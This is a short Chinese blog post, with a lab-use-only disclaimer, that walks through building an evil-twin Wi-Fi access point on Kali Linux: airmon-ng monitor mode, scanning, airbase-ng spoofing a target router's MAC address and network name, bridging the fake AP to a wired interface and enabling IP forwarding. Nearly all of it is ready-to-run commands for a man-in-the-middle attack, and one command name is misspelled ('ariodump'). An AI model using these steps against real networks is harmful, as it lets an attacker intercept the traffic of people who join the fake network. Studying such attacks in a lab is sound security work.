本技术博客只用于实验环境的测试学习，不可用于其他用途，否则造成的后果自行承担！

1.查看网卡并启动相应网卡的监听模式

ifconfig -a

airmon-ng start wlan1

启动监听模式之后网卡名称会变为wlan1mon(根据具体网卡名而有所不同，如：wlan0mon)


查看网卡的工作模式可以用:

iwconfig wlan1mon 查看Mode字样,如果为Monitor则确定当前网卡已进入监听模式

2.指定网卡在信道7进行扫描，寻找目标wifi

ariodump wlan1mon -c 7

3.启动无赖AP，模拟目标路由器(AP)的MAC地址和ESSID(wifi名称)

airbase-ng -a 要模拟的目标MAC –essid “目标wifi名称” wlan1mon

4.创建网桥接口

brctl addbr mitm

brctl addif mitm eth0

brctl addif mitm at0

ifconfig eth0 0.0.0.0 up

ifconfig at0 0.0.0.0 up

5.开启Linux(kali)内核流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

6.为创建的网桥指定ip并启动桥接网卡

ifconfig mitm 192.168.31.22 up

7.验证网络连通性

ping 网关192.168.31.1验证网络连通性

8.探索总结

本次实验我采用外置usb网卡作为功能AP,虽然能ping通网关，且wifi也能连接，但是不能正常上网，根据我多方面研究与测试初步判定为usb网卡本身的问题，

后来用笔记本自带的网卡通过同样的是操作搭建成功，只是AP的网速很慢，只有原始网速的1/20。

原文出自:

http://pyspiderking.cn/index.php/2021/07/29/wireless-wifi-ap/